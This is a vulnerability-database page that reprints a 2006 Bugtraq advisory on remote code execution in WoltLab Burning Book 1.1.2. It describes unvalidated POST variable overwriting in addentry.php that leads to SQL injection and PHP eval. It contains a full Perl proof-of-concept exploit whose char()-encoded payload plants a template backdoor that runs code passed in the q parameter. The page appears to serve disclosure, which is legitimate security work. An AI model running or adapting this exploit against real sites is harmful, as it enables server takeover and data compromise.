WoltLab Burning Book <=1.1.2 multiple vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053111 漏洞类型
发布时间 2006-10-27 更新时间 2006-10-27
CVE编号 CVE-2006-5509
CVE-2006-5508
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2006100136
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Hello bugtraq,

ShAnKaR  (sec at shankar.antichat.ru ) reports multiple vulnerabilities
 in WoltLab Burning Book. Original message in Russian is available from
 http://www.security.nnov.ru/Odocument711.html

Short translation:

Author: ShAnKaR  (sec at shankar.antichat.ru)
 Vendor: woltlab.de
 Tested version: WoltLab Burning Book 1.1.2
 Level: Critical
 Class: Remote code execution

addentry.php file contains this code:

while(list($key,$val)=each($_POST)) {
    $$key=$val;
 }

There  is  no validation for variable names sent with POST request, so,
 it's possible to overwrite system variables. E.g. here:

$db->query("INSERT INTO bgb".$n."_posts 
(iconid,authorname,posttime,message,nosmilies,emai  
l,homepage,icq,aim,yim,msn,ipaddress,useragent,vis  ible) VALUES 
('".intval($iconid)."','".addslashes($name)."',".time().",'".addslashes(
$message)."','".intval($nosmilies)."','".addslashes($email)."','".addsla
shes($homepage)."','".intval($icq)."','".addslashes($aim)."','".addslash
es($yim)."','".addslashes($msn)."','".
$REMOTE_ADDR."','".$HTTP_USER_AGENT."','".(($moderateposts) ? ("0") : 
("1"))."')"); 
 
 it's  possible  to add any data to database, and later this data can be
 executed as a PHP code:

eval("$template->output("".$template->get("index")."");");

Exploit code (burning_book.pl):

#!/usr/bin/perl

# woltlab.de burning book <=1.1.2 SQL and PHP injection PoC
# use /index.php?q=phpinfo();exit;
# ShAnKaR sec[A]shankar.antichat.ru
# http://antichat.ru/

use LWP;
die("use ./burn-book.pl http://localhost/wbbook/ [1(number book db, default `1`)]n") if !$ARGV[0];$ARGV[1]='' if !$ARGV[1];
my $ua=LWP::UserAgent->new();
$ua->post($ARGV[0].'/addentry.php',[reg_image=>0,send=>'send',name=>1,me
ssage=>1,
n=>$ARGV[1].'_templates (`templateid`,`templatename`,`template`) VALUES (char(55,55,55),char(105,110,100,101,120,95,102,105,101,108,100,115),cha
r(92,34,59,64,101,118,97,108,40,36,95,71,69,84,91,113,93,41,59,36,102,10
5,101,108,100,115,61,92,34,60,98,114,32,47,62,60,117,62,36,102,105,101,1
08,100,116,105,116,108,101,60,47,117,62,58,32,36,102,105,101,108,100))/*
',]);

-- 
/3APA3A
http://security.nnov.ru/